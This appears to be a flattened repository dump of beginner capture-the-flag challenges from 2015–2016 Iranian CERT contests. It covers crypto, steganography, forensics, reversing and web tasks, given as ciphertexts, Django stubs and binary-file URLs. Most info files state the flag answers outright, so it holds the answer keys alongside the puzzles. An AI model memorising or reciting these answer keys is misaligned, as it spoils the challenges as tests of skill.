https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/pics/network_security_technology_slide7.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | simple-php-captcha.sublime-project
3 | simple-php-captcha.sublime-workspace
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/45-degree-fabric.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/45-degree-fabric.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/cloth-alike.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/cloth-alike.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/grey-sandbag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/grey-sandbag.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/kinda-jean.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/kinda-jean.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/polyester-lite.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/polyester-lite.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/stitched-wool.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/stitched-wool.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-carbon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-carbon.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-wave.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/backgrounds/white-wave.png
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/fonts/times_new_yorker.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2015/secretdoor/sourcefiles/simple-php-captcha-master/fonts/times_new_yorker.ttf
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Crypto/10pt- different bases/cipher.txt:
--------------------------------------------------------------------------------
1 | OB4GKZJAO5UGO6BMEB4WK5D2EBRGYICUJFKFMTKZPNKXI3DYGMZF6QSHL5FUQTK7KZRGSYJTNN6Q
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Crypto/10pt- different bases/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | well done, flag is APACTF{Base32_IN_ROT_Ciph3r}
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Crypto/5pt- change your position/cipher.txt:
--------------------------------------------------------------------------------
1 | WOL_FGITIENAA{ETOPLEGPC_I_HL,_AHPODE__ICAONERDFSTNS_C}
2 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- use your brain/data:
--------------------------------------------------------------------------------
1 | ----[---->+<]>++.++[->+++++<]>+.[->++++<]>+.++.>-[--->+<]>-.[----->+<]>++.>--[-->+++++<]>.+[-->+<]>++++++++.[++>-------<]>.-------..[--->+<]>-.[->+++++<]>++.---------------.[--->+<]>++.---.--------.+++++++++++.+++[->+++<]>++.++++++++++++..----.+++++.-------.>--[-->+++<]>.
2 |
3 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- use your brain/info.txt:
--------------------------------------------------------------------------------
1 | Description:
2 | I want to give a flag. that simple. So just execute this script to receive that Flag.
3 |
4 |
5 | Flag:
6 | APACTF{Funny_Programming}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- use your brain/use your brain/data:
--------------------------------------------------------------------------------
1 | ----[---->+<]>++.++[->+++++<]>+.[->++++<]>+.++.>-[--->+<]>-.[----->+<]>++.>--[-->+++++<]>.+[-->+<]>++++++++.[++>-------<]>.-------..[--->+<]>-.[->+++++<]>++.---------------.[--->+<]>++.---.--------.+++++++++++.+++[->+++<]>++.++++++++++++..----.+++++.-------.>--[-->+++<]>.
2 |
3 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- what is your dna/cipher.txt:
--------------------------------------------------------------------------------
1 | CACCCGAACAACCACTCTCAGACGCTTTCTCTGGGCCGCCGACAGGAAAGACCACCGGAACTGCGAAGCGAACAGACATGTAACAGACGATCG
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- what is your dna/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{What_!5_ur_DNA!}
3 |
4 | Solution:
5 | Use this site to decrypt it: http://dna2z.com/DNA-o-gram/decode.php#.WG_lop8ksfA
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Misc/5pt- what is your dna/what is your dna/cipher.txt:
--------------------------------------------------------------------------------
1 | CACCCGAACAACCACTCTCAGACGCTTTCTCTGGGCCGCCGACAGGAAAGACCACCGGAACTGCGAAGCGAACAGACATGTAACAGACGATCG
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/hardcoded flag/main:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/hardcoded flag/main
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{Ok4y_u_know_r3v3r53_bas!cs}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/main:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Reverse/5pt- Hardcoded flag/main
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/10pt- easy messaging/cipher.txt:
--------------------------------------------------------------------------------
1 | . ...- . -. -. --- --- -... ... -.- -. --- .-- .-- .... .- - .. ... -- --- .-. ... .
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/10pt- easy messaging/easy messaging/cipher.txt:
--------------------------------------------------------------------------------
1 | . ...- . -. -. --- --- -... ... -.- -. --- .-- .-- .... .- - .. ... -- --- .-. ... .
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/10pt- easy messaging/info.txt:
--------------------------------------------------------------------------------
1 | Description:
2 | Even thieves know this kind of encryption. It's very common and also distincted. Can you decrypt this text. If yes, please put the result in APACTF{} and submit it for me.
3 |
4 | Flag:
5 | APACTF{EVENNOOBSKNOWWHATISMORSE}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/hidden string/nature.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/hidden string/nature.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{Alw4ys_Ch3ck_string_command_f!r57}
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/nature.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/0- FirstTimeCTFers/Steg/5pt- hidden string/nature.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/ascii-art/ascii-art.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/ascii-art/ascii-art.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/ascii-art/flag.txt:
--------------------------------------------------------------------------------
1 | APACTF{d03s_!7_r341y_W0r7h3d_7h47_much_points}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/cipher.txt:
--------------------------------------------------------------------------------
1 | UNUGKJCLDEBUJXW
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/easy cipher.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/easy cipher.zip
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/easy cipher/cipher.txt:
--------------------------------------------------------------------------------
1 | UNUGKJCLDEBUJXW
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/Challenge/vigenere/flag.txt:
--------------------------------------------------------------------------------
1 | APACTF{SUPEREASYCIPHER}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/.name:
--------------------------------------------------------------------------------
1 | crypt_server
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/migrations/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 |
3 | # Create your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/ascii_art_40pt/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/settings.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/settings.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/urls.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/urls.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/wsgi.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/crypt_server/wsgi.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/db.sqlite3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/db.sqlite3
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/migrations/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 |
3 | # Create your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/10-40pt- crypto engine/crypto engine/vigenere_10pt/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/30pt- rare encryption/cipher.txt:
--------------------------------------------------------------------------------
1 | }A rCPdl3TAolhF nep{seW!ri,ca _igyElaoC_luNFfrE
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/30pt- rare encryption/rare encryption/cipher.txt:
--------------------------------------------------------------------------------
1 | }A rCPdl3TAolhF nep{seW!ri,ca _igyElaoC_luNFfrE
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/40pt- rsa1/info.txt:
--------------------------------------------------------------------------------
1 | Description:
2 | Your are provied an encrypted file with some parameters to decrypt it. Flag is in the encrypted file. Find it...
3 |
4 | Flag:
5 | APACTF{N!C3_J08_D3CRYP7!NG_M3}
6 |
7 |
8 |
9 | Usefull source for it:
10 | http://doctrina.org/How-RSA-Works-With-Examples.html
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Crypto/40pt- rsa1/rsa1/data.secret:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Crypto/40pt- rsa1/rsa1/data.secret
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/corroption/file:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/corroption/file
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpe
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/file.jpg
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/20pt- curroption/info.txt:
--------------------------------------------------------------------------------
1 | Flag:
2 | APACTF{IT'S_JUST_THE_Begining_OF_For3nsics}
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/arp-poison:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/arp-poison
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack.pcapng
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack1/attack.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/Forensics/40pt- attack1/attack1/attack.pcapng
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/.name:
--------------------------------------------------------------------------------
1 | project
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/dataSources.local.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/admin.py:
--------------------------------------------------------------------------------
1 | from django.contrib import admin
2 |
3 | # Register your models here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/admin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/admin.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/forms.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/forms.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/models.py:
--------------------------------------------------------------------------------
1 | from django.db import models
2 | from django.contrib.auth.models import User
3 |
4 |
5 | class Flag(models.Model):
6 | challenge = models.CharField(max_length=20)
7 | flag = models.CharField(max_length=100)
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/views.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/app/views.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.py
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/__init__.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/models.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/models.pyc
--------------------------------------------------------------------------------
/Challenges/IRAN Cert/2016/1- Easy/PPC & Web/project/challenge_easy_math_40pt/views.pyc:
--------------------------------------------------------------------------------
